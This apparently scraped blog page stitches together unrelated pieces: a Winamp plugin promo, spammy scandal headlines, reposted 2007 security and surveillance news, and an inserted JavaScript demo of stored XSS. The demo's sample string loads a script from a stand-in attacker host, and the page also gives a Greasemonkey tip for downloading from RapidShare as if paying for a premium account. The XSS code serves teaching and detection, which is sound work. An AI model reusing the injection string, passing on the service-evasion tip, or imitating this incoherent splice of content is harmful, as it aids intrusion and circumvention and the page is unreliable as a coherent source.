Gretchen Bareto Scandal


Gretchen Bareto Scandal this is taken after

Posted in | 0 comments

Yahoo! Messenger 9.0 Now Playing plugin for Winamp

(also works with Yahoo! Messenger 8.1 or older)

Features:::....

- new: works with Yahoo! Messenger 9.0! This is most probably the first Winamp plugin that supports this latest version! (also works with Yahoo! Messenger 8.1 or older)
- new: maximum 'Album' text increased to 50 characters
- fixed small bug: status was not changed for users who never changed their YM status
- new: supports changing the status when you are logged in with a non-default Yahoo! profile
- new: this homepage created!
- added 6 more placeholders: Album, Genre, Track No, Year, Volume, Channels - that makes a total of 14!!
- status will NOT be changed if it is currently Invisible
- bug fix: winamp.exe still running as a process after closing (very sorry about that :|)
- default refresh interval is now one second; removed obsolete option to ask the user if he is running YM 8
- does not require you to let YM remember your user name and password
- you can format the status with eight media details (most of the same details available in HyperIM's plugin, but with shorter names, and of course not recursive)
- multiple lines in the status
- optional headphones in the status
- up to 255 characters in the status
- optional Busy or Idle icons, with or without the headphones
- no advertising in the status, not at any time, like many other plugins do.

Installation and Help:::...


1. If you are upgrading from a previous version, close Winamp if it is currently running.
2. Download the installer (see the head of this page), which is a ZIP file.
3. The installer is inside the archive. Most probably you will be able to double click the file directly from the archive viewer to run the installer.
4. If not, extract the file somewhere and run it from there.
5. After the installer is done, open Winamp, go to Preferences, click the General Purpose list item in the lower left panel, and double click Yahoo! Messenger Now Playing to configure the plugin as you like it.



download here


rapidshare premium account

Here is some info on how to download from RS.com as if you had a premium account:
1. Download the latest edition of Firefox and install it.
2. Download the Greasemonkey extension:
Here

Restart Firefox, then download this:
Here

Unrar it and drop 9116.user.js into Firefox.
When you go to rapidshare.com you can then use a download manager.


Epic Boobs


Apple to copy Windows DRM

TOYMAKER Apple has decided that Microsoft's Windows Genuine Advantage is so wonderful that it is trying to patent something similar.

Apple has been doing wonderful things this year to really miff its loyal fan base, and it seems it wanted to close the year by nicking the thing that annoys even the most loyal Microsoft user.

The outfit has updated the patent application it calls "Run-time Code Injection to Perform Checks".

This patent tells the story of how Apple boffins invented the idea of a digital rights management system that could restrict use of an application to specific hardware platforms.

Apparently, the software phones home for an authenticity check.

If the software is pirated then Jobs Mob shall deem the software unworthy in its sight and make it unusable.

Currently, Apple does not dabble in the area of DRM-style security and would be well advised to stay away from it. After all WGA is one of the main reasons that people have stayed away from Vista.

It seems that Apple has been concentrating on its iPhone and iPod gadgets so much that it has failed to notice that Microsoft got prior art on DRM that stuffs up the operating system and annoys the user.


Tories offer NHS IT rescue plan after major patient data losses

The Tory party has put forward a rescue plan for the NHS IT system in the wake of the latest government data losses, which were revealed over the weekend. Nine English NHS trusts have owned up to large scale losses of personal data, and although in most cases the nature of this data has yet to be revealed, City & Hackney Primary Care Trust reportedly mislaid the names and addresses of 160,000 children.

Speaking on Radio 4's Today programme, Tory Shadow Health Secretary Andrew Lansley said that the losses illustrated the dangers of holding all NHS records on a single database that could be accessed by 300,000 individuals. The system need not however, he stressed, be entirely abandoned. Instead, data should be held on smaller, interoperable local databases.

Records could then be shared when needed, with an audit trail held of individual accesses. The Department of Health argued, somewhat unconvincingly under the circumstances, that the central database would protect personal data because of the strength of its security systems. The Tory plan, however, appears to have merit in that it provides a viable, but more secure, way forward using the infrastructure that's being put in place under the government NHS plans. Effectively, this kind of approach could provide the government with an escape hatch, should it wish to use it.

The latest breaches, a total of ten across nine trusts, have emerged as part of the government's post-HMRC data security review. The City & Hackney loss occurred when a disc containing the data failed to arrive at an East London hospital, while other losses are thought to have been of data stored on laptops and transferred on flash drives. It's worth noting that as this indicates poor handling practices for bulk data (precisely the problem that has been horribly exposed in government systems recently), neither the centralised system nor the Tory alternative is of itself a fix.

The Department of Health claimed that there is no evidence that the data might have fallen into the wrong hands, but said that the breaches were being dealt with locally by the individual trusts. Initially it said it did not have details of how many patients have been affected, but this morning it estimated a total of 168,000. It is, one might observe, a puzzle that the DoH seems unable to furnish details of the problem, but is able to say that there probably isn't one - how does that work?

It's also worth noting that, were it not for the HMRC blunder and the consequent security review being carried out by Cabinet Secretary Gus O'Donnell, all of the data losses now being reported would still have taken place, but few if any would have been revealed. So far the government has published one interim report on the HMRC incident and a progress report on the broader O'Donnell review. Full reports on both are due "in the spring." ®


FBI aims for world's largest biometrics database

The FBI is embarking on a $1 billion project to build the world's largest computer database of biometrics to give the government more ways to identify people at home and abroad, the Washington Post reported on Friday. The FBI has already started compiling digital images of faces, fingerprints, and palm patterns in its systems, the paper said.

In January, the agency--which focuses on violations of federal law, espionage by foreigners, and terrorist activities--expects to award a 10-year contract to expand the amount and kinds of biometric information it receives, it said.

At an employer's request, the FBI will also retain the fingerprints of employees who have undergone criminal background checks, the paper said.

If successful, the system, called Next Generation Identification, will collect the biometric information in one place for identification and forensic purposes,


N.H. business says hacker ran up phone bill

FRANKLIN, N.H.—A New Hampshire business says a hacker rang up an $8,700 phone bill for one call to Saudi Arabia.

Michael Bednaz, owner of Hexa Interactive Communications, says the caller talked for 808 minutes and insists it wasn't one of his employees.

AT&T is suing him for not paying a $14,600 phone bill -- which includes the call to Saudi Arabia and several other overseas calls Bednaz says aren't his responsibility.

Bednaz says he doesn't use AT&T for long distance. The calls were made late at night when the business isn't open. Bednaz hasn't had any luck persuading AT&T the calls aren't his. The company sued him earlier this month.


Think Secret to close after Apple settlement

Apple rumour website Think Secret is closing down as part of a legal settlement with the computer company.

Apple launched a lawsuit against the site in January 2005 after it published details of the Mac Mini two weeks before its official announcement.

Nick Ciarelli, the publisher of Think Secret, had refused to divulge his sources, prompting Apple to take legal action.

A court in California ruled in March 2005 that bloggers from Powerpage, Apple Insider and Think Secret had to reveal their sources, but Ciarelli refused.

Ciarelli insisted that the agreement was a "positive solution for both sides".

"As part of the confidential settlement, no sources were revealed and Think Secret will no longer be published," an official statement said.

Ciarelli added that he would now concentrate on other journalistic opportunities. "I am pleased to have reached this amicable settlement, and will now be able to move forward with my college studies and broader journalistic pursuits," he said.


TJX settles with banks over data breach

Retail giant TJX Companies and the Massachusetts Bankers Association announced on Tuesday that the company had settled lawsuits with every bank association and bank, save one, that had sued the company following the theft of credit- and debit-card data from its computer systems between

Under the terms of the agreement, TJX has denied all wrongdoing and will pay the banks a negotiated part of their expenses from the case, excluding attorneys' fees. In addition, three individual banks and the nearly 300 banks represented by the Connecticut Bankers Association, Maine Association of Community Banks, and Massachusetts Bankers Association will dismiss all of their claims against TJX. The associations will recommend that their members apply for part of the $41 million settlement offered by TJX to Visa issuers as part of a settlement with the credit-card company.

"Through that offer, TJX has agreed to fund up to $40.9 million in payments to Visa issuing banks which may have suffered damages as a result of the data breach," Daniel J. Forte, president of the Massachusetts Bankers Association said in a statement (PDF). "This alternative recovery solution will, in many cases, allow issuing banks to recover more than would otherwise be possible through existing recovery mechanisms."

The settlement ties up a number of legal loose ends for TJX, following its announcement nearly a year ago that a security breach of its transaction processing network had resulted in data thieves stealing information on 45.6 million credit- and debit-card accounts. Bankers' groups sued the company for their members' costs in replacing the cards, but the judge handed the banks a significant loss when he refused to allow them to pursue the case as a class. Evidence presented in the lawsuits in August raised the estimate of the number of cards affected by the breach to more than 100 million.

Litigation following breaches at TJX and other retailers has convinced many merchants to minimize the amount of data collected in a transaction. However, Visa, whose cards accounted for about two-thirds of those stolen, has estimated that 3 out of 10 retailers have yet to comply with the industry's standard for data protection.

In its statement on the settlement, TJX stressed that the payment industry must also shoulder responsibility for better security.

"The TJX experience underscores broader challenges facing the U.S. payment card system that require urgent action by merchants, banks, payment card companies and associations, and we look forward to greater cooperation in order to better serve and protect customers," Carol Meyrowitz, CEO of the retailer, said in a statement.

TJX's previous estimate of the cost of the breach totaled $156 million through fiscal 2009, and includes the latest settlement and a settlement with consumers that is pending court approval.

A lawsuit brought by AmeriFirst Bank, of Union Springs, Alabama, remains unresolved as do state and federal investigations into the TJX breach.


Watch these FTC privacy principles and expect a skirmish

Along with its approval of Google’s DoubleClick acquisition Thursday the Federal Trade Commission outlined some core privacy principles that may have a bigger impact than the merger over time.

While Google’s acquisition of DoubleClick is getting all of the attention (Techmeme, blog post and news story) these privacy proposals–and the debate that ensues–are likely to become a big deal.

These principles sound great in theory, but in reality there will be some hand wringing among Web publishers including giants like Google, Microsoft and Yahoo. Let’s dissect the FTC’s principles.

1. The FTC wants transparency and consumer control of data used for behavioral advertising. Fair enough. Who wouldn’t be for that? The FTC argues that existing privacy disclosures are “difficult to understand, inaccessible, and overly technical and long.” Hard to argue with that point either.

Here’s the FTC’s proposal to remedy the issue:

Every website where data is collected for behavioral advertising should provide a clear, concise, consumer-friendly, and prominent statement that (1) data about consumers’ activities online is being collected at the site for use in providing advertising about products and services tailored to individual consumers’ interests, and (2) consumers can choose whether or not to have their information collected for such purpose. The website should also provide consumers with a clear, easy-to-use, and accessible method for exercising this option.

Why this won’t go over well: More consumer friendly disclosures should be a no-brainer. After all, the mutual fund industry did it a few years ago. The real haggling will be over how friendly these privacy statements become and how much a company has to disclose. Let’s ponder Company A, which takes your registration data, sells it to everyone, abuses the database and spams the hell out of you.

What exactly is Company A’s privacy statement going to look like? How about four bullet points (fancy graphic optional):

  • We will take your data.
  • We will share it with the world.
  • We will spam you to death.
  • The End.

No one would go along with that–even though those same points may be buried in today’s privacy policies under four tons of legalese.

All of that brings me to the second part of this principle: An easy way for consumers to choose whether their information can be collected. The problem with advertisers is this: No one will choose to hand their data over if opting in and out becomes easier. Expect a lot of tap dancing over this principle.

2. Reasonable security, and limited data retention, for consumer data. The FTC argues that data collected for behavioral targeting may not be secured well. The FTC acknowledges that some of this data may be useless to a hacker, but you never know. There are two principles on the table here:

Any company that collects and/or stores consumer data for behavioral advertising should provide reasonable security for that data. Consistent with the data security laws and the FTC’s data security enforcement actions, such protections should be based on the sensitivity of the data, the nature of a company’s business operations, the types of risks a company faces, and the reasonable protections available to a company.

The problem with that proposal is that the term “reasonable security” is sketchy. Will Google be under the same standard as a medical information company?

And the other proposal, which covers how long companies should store data:

Companies should retain data only as long as is necessary to fulfill a legitimate business or law enforcement need. FTC staff commends recent efforts by some industry members to reduce the time period for which they are retaining data. However, FTC staff seeks comment on whether companies can and should reduce their retention periods further.

I could argue that the retention time shouldn’t exist at all. But that’s unrealistic. How much time is necessary? The good news is that this proposal is doable–it may just take legislators to force the issue. It is clear that 18 months doesn’t make the cut to the FTC.

3. Affirmative express consent for material changes to existing privacy promises. The FTC recognizes that businesses “may have a legitimate need to change their privacy policies from time to time,” but companies shouldn’t change practices willy-nilly. Think shareholder approval meets privacy policies.

The proposal:

As the FTC has made clear in its enforcement and outreach efforts, a company must keep any promises that it makes with respect to how it will handle or protect consumer data, even if it decides to change its policies at a later date. Therefore, before a company can use data in a manner materially different from promises the company made when it collected the data, it should obtain affirmative express consent from affected consumers. This principle would apply in a corporate merger situation to the extent that the merger creates material changes in the way the companies collect, use, and share data.

This proposal sounds doable, but the FTC may be barking up the wrong tree. The financial companies regularly change their privacy policies and tell me via some statement I rarely read.

4. Affirmative express consent to (or prohibition against) using sensitive data for behavioral advertising. The FTC says sensitive data shouldn’t be used for advertising when an individual can be tracked unless specifically authorized.

The proposal:

Companies should only collect sensitive data for behavioral advertising if they obtain affirmative express consent from the consumer to receive such advertising. FTC staff seeks specific input on (1) what classes of information should be considered sensitive, and (2) whether using sensitive data for behavioral targeting should not be permitted, rather than subject to consumer choice.

The big argument on this proposal will be what information is deemed sensitive. A bigger haggling point will be whether this targeting should be allowed at all. There’s a whole industry using behavioral targeting to get CPMs up. Expect a heated debate.

5. Using tracking data for purposes other than behavioral advertising. Should behavioral targeting data be tracked for anything other than advertising? There’s no FTC proposal on this one, but the commission is looking for additional comments about what secondary use of data is acceptable, whether the information is being used today and what protections are needed. It’s safe to assume the FTC will get some input on all sides on this item.


Email lottery scams reaping rich rewards

Half of all spam involves lottery scams making them one of the fastest growing areas of cyber-crime, according to research commissioned by Microsoft across Germany, Italy, Denmark, the UK and The Netherlands.

The problem is worse in the UK where around 62 per cent of spam emails are lottery scams.

Disturbingly, 16 per cent of those who received 'lottery spam' opened at least some of them, 10 per cent replied to one of these emails, and 20 per cent admitted to clicking on links inside the emails.

Three per cent of respondents said they have lost money to scammers over the past 12 months.

"Internet lottery scams are one of the fastest growing areas of cyber-crime," said Ed Gibson, chief security advisor for Microsoft in the UK.

"The scams are of increasing concern to international law enforcement, offering criminals a low-risk opportunity to steal money from internet users."

Microsoft said that the scams are particularly insidious in that they work purely through social engineering, rather than by exploiting a technical flaw in software.

As a result, they represent huge challenges to law enforcement, as they are extremely difficult to track, and even more difficult to catch and prosecute fraudsters.

"Lottery scams entice people with the false promise of large sums of money for little or no effort on their part," said Jacques Erasmus, a security specialist from Prevx and former 'white hat' hacker.

"Once a person is involved in the scam, they are asked to pay certain amounts of money to expedite the process such as an up front 'administration fee'. They end up not making a single pound."

A study by the Internet Crime Complaint Center revealed that advance fee frauds such as lottery scams are the costliest type of internet fraud with a median of $5,000 per victim.

"We want to raise awareness of a growing type of internet crime. Make no mistake, the criminals that perpetrate these crimes are extremely clever and devious, and unfortunately successful," added Gibson.


FBI E-Mail Shows Rift Over Warrantless Phone Record Grabs

By now it's well known that FBI agents can't always be troubled to get a court order before going after a surveillance target's telephone and internet records. But newly released FBI documents show that aggressive surveillance tactics have even caused friction within the bureau.

"We deal mostly with the fugitive squad here, and, like in many other offices, these guys have a reputation for cutting corners," a surveillance specialist at the FBI's Minneapolis field office complained in an internal e-mail last year. "I'm not bashing them; it's the way they do business. Getting a court order is the absolute last step, if they have to.

"Before I had a blowup with a particular agent ... we were constantly asked to call our contacts at service providers to see if we could get various information without having to get a court order," the message continues. "This gets old, believe me. ... Doing this once or twice to help out turns into SOP (standard operating procedure) ... It's expected, and you're criticized as a tech agent if you refuse to do this later on."

The revelation is the second this year showing that FBI employees bypassed court order requirements for phone records. In July, the FBI and the Justice Department Inspector General revealed the existence of a joint investigation into an FBI counter-terrorism office, after an audit found that the Communications Analysis Unit sent more than 700 fake emergency letters to phone companies seeking call records. An Inspector General spokeswoman declined to provide the status of that investigation, citing agency policy.

The June 2006 e-mail (.pdf) was buried in more than 600 pages of FBI documents obtained by the Electronic Frontier Foundation in a Freedom of Information Act lawsuit.

The message was sent to an employee in the FBI's Operational Technology Division by a technical surveillance specialist at the FBI's Minneapolis field office -- both names were redacted from the documents. The e-mail describes widespread attempts to bypass court order requirements for cellphone data in the Minneapolis office.

Remarkably, when the technical agent began refusing to cooperate, other agents began calling telephone carriers directly, posing as the technical agent to get customer cellphone records.

Federal law prohibits phone companies from revealing customer information unless given a court order, or in the case of an emergency involving physical danger.

The documents are the second batch released by the EFF after winning a Freedom of Information Act lawsuit last May. The first set of documents shed light on the breadth and sophistication of the FBI's national wiretapping system, which is wired into telecom switches around the United States under the terms of the 1994 Communications Assistance for Law Enforcement Act -- a law that was extended to broadband internet switches in May of this year.

The new documents detail how a little-known FBI telephone intercept unit has developed a powerful cellphone tracking technology that agents use to monitor the physical movements of surveillance targets, even on phones that are not GPS equipped.

Originally developed to capture and arrest computer hacker Kevin Mitnick in 1995, the system today relies on a mobile FBI van that has access to a wireless carrier's cell site tracking information in real time. A special surveillance unit called the Wireless Intercept and Tracking Team (WITT) operates the van, using the cell site location to get to the approximate location of the cellphone customer, then uses direction-finding gear to zero in on the target.

The technical agent complained in the e-mail that FBI agents looking for a suspect tend to skip gumshoe investigative techniques in favor of the slick tracking van. "These guys always want to take the WITT vehicle out and drive around half of town (sic) to find the guy," the agent wrote.

The tracking system is part of the FBI's Digital Collection System, or DCS, a suite of software packages used for criminal and intelligence phone taps, which relies on a massive interlinked fiber-optic network that connects surveillance terminals around the country.

In brief, the mobile tracking system works as follows:

1. FBI agents investigating a case prepare a court order saying a cellphone number is likely relevant to an ongoing investigation, and a judge signs off on it.
2. The court order is faxed to a mobile carrier, which then turns on surveillance in its switches, and begins delivering call data and cell site information to the FBI's DCS 3000 software.
3. That software keeps track of which cellphone towers a phone uses or pings. A central FBI database translates a mobile carrier's cell tower code to latitude and longitude coordinates.
4. The software sends the coordinates to the agents and technical personnel in the mobile unit, who then drive to the general area. But since cell tower information is not precise, agents in the van use an antenna array connected to tracking software to zero in on the cellphone.

The FBI's technology office trumpeted the tracking function of the DCS 3000 software in a letter to the FBI director, boasting that it was used after a December 2005 North Carolina kidnapping to help find the victim unharmed.


Indonesian hacker touches souls by bringing down police website

Transmigration of the SQL

The path to enlightenment got a little shorter for the citizens of Tucson, Arizona and they have a hacker half-way around the world to thank.

An Indonesian man who goes by the handle Hmei7 bypassed the city's firewall and executed a SQL injection on the website of the Tucson Police Department. That gave him access to the media section of the department's site, where he changed the titles of all the media releases to "Hmei7 has touched your soul."

A quick web search suggests the city isn't the first group to be blessed by the web defacer. Indeed, he's also kissed the souls of people in Okaloosa County, Florida, if this press release is to be believed.

Tucson police officials were alerted to the hack two weeks ago, after a website visitor spotted the messages. They took the site down immediately and only managed to bring it back up in the last 24 hours.

No doubt, the two-week disruption came as an inconvenience to some. But we'd argue it was a small price to pay if it leads the way toward Nirvana. ®


Portuguese-speaking worm attacks Google Orkut users

Google's Orkut social networking site was hit by a quick-spreading worm that managed to infect a large number of users when they viewed messages that came from friends who were already exposed.

Infected users became part of a community dubbed "Infectatos pelo Virus do Orkut," which loosely translates from Portuguese to mean "infected by the Orkut Virus." More than 655,000 members belonged to the group at time of writing, although some people may have joined voluntarily rather than being forcibly corralled into it by the worm. Within hours, Google appears to have closed the cross-site scripting (XSS) error that made the attack possible.

The incident is the latest reminder of the risks that lurk in social networks, which more and more people use to keep track of business contacts, schedules and other important information. In many respects, it hearkens back to the Samy Worm, a piece of Javascript that in 2005 infected more than 1 million MySpace users. Such attacks are significant because they require nothing more than that a victim browse a trusted website.

"It wouldn't have taken much to turn this into an actual malicious attack," said David Maynor, CTO of security services firm Errata Security. "Attacks like this are shifting the paradigm where you just shouldn't trust anything."

Maynor said it would have been relatively trivial for the authors of the Orkut worm to steal an Orkut user's logon credentials, which in most cases are also used to access a person's Google mail and calendar accounts, web searches and recently browsed map locations.

The worm appended a piece of malicious, Flash-based Javascript to a user's profile and then sent a message to all the victim's friends. When friends viewed the message they became infected as well.

It burrowed in using a hole created by an XSS error in code written by Google webmasters. XSS vulnerabilities allow attackers to inject script into a page served by a trusted website, so the victim's browser runs that script with all the trust it extends to the site. XSS bugs have emerged as a major source of security vulnerabilities that over the past year have tripped up Google, Yahoo and many other major web destinations.

The Orkut worm exploited a hole on the Google-owned site that allowed a Javascript file titled virus.js to be fetched from a location at MyOpera and injected into users' profiles.

As is so often the case with XSS-based attacks, the Orkut worm was mitigated by the use of the NoScript plugin. It runs on top of the Firefox browser and prevents the execution of Java, Javascript, Flash and other potentially dangerous code on untrusted websites. ®
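As an added illustration of the stored-XSS pattern the article describes (example code, not Orkut's or Google's): a profile field rendered straight into HTML beside the same rendering with output encoding, plus a small check a defender can run over stored profile text to flag external script references. The hostname and sample profile text are constructed.

```javascript
// Added example; not code from Orkut, Google or the worm.
// renderProfileVulnerable() interpolates a user-supplied profile field straight
// into HTML, so a stored <script src=...> tag is fetched and executed by every
// visitor who views the profile. renderProfileHardened() HTML-encodes the field
// first, so the same input is displayed as inert text. findExternalScripts() is
// the detection side: it lists the src of every script tag in stored HTML.

function renderProfileVulnerable(aboutMe) {
  // Vulnerable: raw user text becomes markup in the page.
  return `<div class="about">${aboutMe}</div>`;
}

function escapeHtml(text) {
  // Encode the five characters that can change the meaning of HTML text or
  // attribute content. '&' is matched by the same regex pass, so already
  // encoded input is not double-escaped by a second character class.
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderProfileHardened(aboutMe) {
  // Hardened: the field is encoded at output time, so it can only ever be text.
  return `<div class="about">${escapeHtml(aboutMe)}</div>`;
}

function findExternalScripts(html) {
  // Return the src value of every <script src=...> tag in a stored HTML blob.
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const hits = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    hits.push(m[1]);
  }
  return hits;
}

// Constructed sample inputs (not data from the incident). The hostname is a
// placeholder; only the file name mirrors the one the article mentions.
const SAMPLE_BENIGN = 'Likes music & <3 travel';
const SAMPLE_INJECTED =
  'hi<script src="http://attacker.invalid/virus.js"></script>';

function demo() {
  const vulnerable = renderProfileVulnerable(SAMPLE_INJECTED);
  const hardened = renderProfileHardened(SAMPLE_INJECTED);
  return {
    // The raw render carries a live external script reference.
    vulnerableLoads: findExternalScripts(vulnerable), // ['http://attacker.invalid/virus.js']
    // The encoded render carries none: the tag is now literal text.
    hardenedLoads: findExternalScripts(hardened), // []
    hardenedMarkup: hardened,
  };
}

console.log(demo());
```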


FBI Recorded 27 Million FISA 'Sessions' in 2006

At the end of 2006, the FBI's Telecommunications Intercept and Collection Technology Unit compiled an end-of-the-year report touting its accomplishments to management, a report that was recently unearthed via an open government request from the Electronic Frontier Foundation.

Strikingly, the report said that the FBI's software for recording telephone surveillance of suspected spies and terrorists intercepted 27,728,675 sessions.

Twenty-seven million is a staggering number given that the FBI only got 2,176 FISA court orders in 2006 from a secret spy court using the Foreign Intelligence Surveillance Act.

According to the math that means each court order resulted in 12,742 "sessions," all in regards to phone, not internet, surveillance.

FISA watchers have long wondered whether FISA warrants covered more than one person. Knowing how many calls or text messages the FBI captured could add a piece to the puzzle.

Unfortunately, nothing in the documents turned over so far to the Electronic Frontier Foundation explains what a session is. Does it refer to one session of listening in on a target's conversation, even if it is minimized for not being relevant? Does it include text messages? Do the incoming call number and the recording of the call count as two sessions? Do cell phone pings that reveal the general location of a target count as a session? Unknown.

Steven Aftergood, who runs Secrecy News for the Federation of American Scientists, says it's an odd, and not so useful statistic:

I've never seen a number like that. When I hear 27 million sessions that sounds like they are talking about individual communications that were monitored for each individual target.

Aftergood thinks that if you take the number of targets and add them up, it's not that crazy a number. He also suspects that there are likely fewer than 2,100 foreign surveillance targets and that each target likely gets multiple orders - one for a fax line, one for a cell phone, one for a secret house search, etc.

It's a surprising statistic to keep because it doesn't tell you much. What you want to know is how many of the foreign intelligence surveillance sessions were of significance. If only three out of 27 million were useful, that would tell you something, but one number without the other is meaningless.

Of note is that the software at issue, the DCS-5000, gets information from carriers after they turn on surveillance on their switches once they get a court order (CALEA mandates the switches be wiretap-compliant). That means this number ostensibly has nothing to do with the government's secret warrantless wiretapping program, or the government's data-mining of billions of call records.

See the 27 million figure here (.pdf) (p. 35) and drop your reasoned or snarky hypotheses in the comments.

Check Wired.com Wednesday evening for a fuller story on the Freedom Of Information Act-obtained documents.

For a primer on the FBI's Digital Collection System and how it works with wiretap-friendly telecom switches, check this August story: Point, Click ... Eavesdrop: How the FBI Wiretap Net Operates


Facebook sues porno hackers

Social networking giant Facebook has named several defendants in a lawsuit alleging unlawful access to its servers in an attempt to steal information about its users.

Canadian porn site operator SlickCash allegedly tried to access Facebook's servers at least 200,000 times over two weeks in June using an automated script that attempted to harvest information from other Facebook users.

The suit was amended to name SlickCash along with Toronto residents Brian Fabian, Josh Raskin and Ming Wu, as well as Istra Holdings, which owns SlickCash.

The lawsuit (PDF) was originally filed in June in a US District Court in California against 10 unknown individuals and 10 unknown companies.

But the names were added after Facebook obtained court orders forcing service provider Look Communications to hand over subscriber information connected to two IP addresses associated with the attack.

"These requests for information from Facebook generated error messages and were detected as unauthorised attempts to access and harvest proprietary information belonging to Facebook," said David Chiappetta, Facebook's lawyer.

The legal filing claims that the attack cost Facebook over $5,000. The company is seeking undisclosed financial damages.


US warrantless wiretapping predates 9/11

Fresh evidence has emerged that the US government's warrantless wiretapping program predates the 9/11 terrorist attacks.

Secret surveillance operations that enabled the National Security Agency (NSA) to access telecommunications traffic data have been in place since the 1990s, according to the New York Times. In an attempt to gain intelligence on narcotics trafficking, the NSA forged an uneasy alliance with telcos to gather data on phone calls and emails from the US to Latin America.

The alliance between the US government and telcos to gather call records involving thousands of US and foreign citizens was constrained by legal worries and fears of public exposure. Even so, it took until 2004 for one unnamed carrier to break ranks and refuse to provide customer data, the paper reports.

Separately, US carrier Qwest refused to provide NSA spooks with access to local communications switches (a move that would have allowed surveillance of domestic phone calls without a court order) in early 2001 - before the devastating World Trade Center attacks in September that year.

Negotiations between the NSA and AT&T in February 2001 allegedly involved replicating a New Jersey network centre to allow the US signals intelligence "access to all the global phone and email traffic that ran through it". The incident has become one aspect of a lawsuit which also brings in allegations that Verizon set up a dedicated fibre-optic line from New Jersey to a large military facility in Quantico. Spooky.

An AT&T technician at the time has provided evidence supporting the allegations. However, other AT&T technicians are due to testify that the project was confined to improving internal communications within the NSA.

News that the NSA eavesdropped on the international communications of terrorism suspects making calls from the US without warrants first emerged two years ago. The latest revelations that this was a development of a much longer running practice that also involved US domestic calls come as the Bush administration is pushing Congress to pass legislation indemnifying telecoms carriers from liability in assisting law enforcement with warrantless eavesdropping programs. Since 2005, the warrantless wiretapping program has become the topic of 40 lawsuits. ®


The Truth Behind Wowowee Scandal


View Silkroad Online Character Info on Rev6


Microsoft Security Update Cripples Internet Explorer

Microsoft Corp. confirms that it is investigating reports that a security update for Internet Explorer issued last week has crippled some users' ability to get on the Web with the browser.

Users started posting messages to multiple Microsoft support newsgroups almost immediately after Microsoft released the MS07-069 security bulletin on Dec. 11, saying that they were unable to connect to the Internet, either because IE refused to open or because when it did open, it could not reach various sites.

"About 60% of the time, I would get an 'Internet Explorer has encountered a problem and must close' dialog," reported Bill Drake on the Windows Update newsgroup. Others echoed those comments on IE-specific forums, noting that both IE6 and IE7 balked at loading, or while loading, some pages, particularly home pages, on both Windows XP and Windows Vista machines.

Harold Decker, operations manager at San Diego-based Gold Peak Industries NA Inc., started fielding calls from users last Wednesday morning as soon as people hit the office. "I stopped everyone who hadn't installed the update from installing it, after four PCs out of 14 had the problem," said Decker, who manages a total of 35 Windows XP SP2 machines. "We're a pretty plain shop; all our systems run Windows XP SP2 and IE6," said Decker. "But some kept crashing. It seemed limited to the window that was opened, and changing the home page to something simple, like a blank page, gave a better success rate."

Decker cited numerous brand-name sites that workers at Gold Peak couldn't reach without crashing IE, including Federal Express' and Lowe's Home Improvements.

Microsoft said it is on the case. "Our customer service and support teams are investigating public claims of a deployment issue with Microsoft Security Bulletin MS07-069," Microsoft's Mark Miller, director of security response, acknowledged in an e-mail. "If necessary, Microsoft will update the Knowledge Base article associated with MS07-069 with detailed guidance on how to prevent or address these deployment issues," Miller added.

Other users on the support forums weren't much help, except to suggest uninstalling last Tuesday's security update. That's what Decker did. "We uninstalled [MS07-069] and have had no problems since then," he said.


Apple releases dozens of Tiger, Leopard security updates

It's download time again for Mac OS X users, as 31 new security-related fixes for both Tiger and Leopard were made available by Apple Monday afternoon.

The security patches are mostly geared for users of Mac OS X 10.4, known as Tiger, but there's a bunch as well for version 10.5, known as Leopard. They should be automatically pushed to Mac users through the Software Update function, but you can also go to Apple's Web site and download the patches.

A number of serious vulnerabilities, such as ones that could lead to a malicious attack on your system, are fixed with the latest update. This includes several flaws that could lead to a remote attacker executing malicious code on a Mac in programs like Address Book, the Safari browser's RSS feed, and CUPS (common Unix printing system), among other things.

Apple updated QuickTime last week in order to fix an important flaw in that program. As part of Monday's patches, Apple also shipped a patch for Windows users of Safari that was addressed for Mac users as part of the larger series of patches.


'Critical' flaws in voting systems worry Ohio

Ohio's electronic voting systems have such significant security vulnerabilities that the machines do little to ensure the integrity of the elections, stated a report released on Friday by Ohio's Secretary of State.

The report, dubbed the Evaluation and Validation of Election Related Equipment, Standards and Testing (EVEREST), described the conclusions of two analysis firms -- Denver-based SysTest Labs and Columbus, Ohio-based MicroSolved -- and three academic teams to test election systems made by Premier, ES&S and Hart InterCivic. The manufacturers' systems failed to meet any of twelve baseline security criteria -- such as the use of a firewall, end-to-end encryption and secure development practices -- except for ES&S's system, which met one of the criteria.

Because of the lack of effective security measures, the report's authors stated that the integrity of the vote “is provided purely by the integrity and honesty of election officials.”

“The results underscore the need for a fundamental change in the structure of Ohio’s election system to ensure ballot and voting system security while still making voting convenient and accessible to all Ohio voters,” Jennifer Brunner, Ohio's Secretary of State, said in a statement published on Friday. “In an era of computer-based voting systems, voters have a right to expect that their voting system is at least as secure as the systems they use for banking and communication.”

Ohio, and at least a handful of other states, had problems with election machines during the 2006 general election. Many security researchers have focused on Diebold Election Systems' machines, following a leak of some of the source code used in that system. In 2006, a problem with an election system's ballot configuration likely confused voters in Florida, leading to a much higher-than-normal undervote for a contested seat in the U.S. House of Representatives.

All three voting machine makers -- Premier, ES&S and Hart -- took issue with the EVEREST report.

"We can say that, based on our initial review, we strongly disagree with some of the technical findings in the report," ES&S said in a statement. Hart and Premier (PDF) also posted statements on the report.

Secretary Brunner recommended that Ohio move to central counting of ballots, allowing absentee voting, and eliminate voting that does not create a tangible record of the vote, relying on optical scan ballots.


Heavily armed cops raid IM chat

A California family that found their apartment surrounded by more than a dozen heavily armed SWAT officers are among the latest victims of swatting, a crime designed to elicit an emergency response by reporting a bogus 911 call.

Officers from the Salinas Police Department rushed to the apartment last Wednesday after receiving a report from someone claiming to be a 15-year-old boy saying three men wielding AK-47 assault weapons were trying to break into his apartment. The caller said he was hiding in a closet to elude the gunmen.

After police evacuated a mother and daughter from the apartment, they discovered another resident, a 15-year-old boy, had been holding an online chat with a person believed to be connected to the dangerous prank. The online acquaintance, who said he was located in Chicago, asked the boy if he heard any sirens approaching around the same time the police were arriving.

Swatting uses a combination of social engineering, phone phreaking and computer hacking to harass individuals. In many cases, the swatter will trick the victim into divulging a physical address and then use a VoIP system to make it look like the victim has initiated an emergency call from his address. This often prompts a response from SWAT teams who conduct emergency raids on the homes of people whose numbers were spoofed.

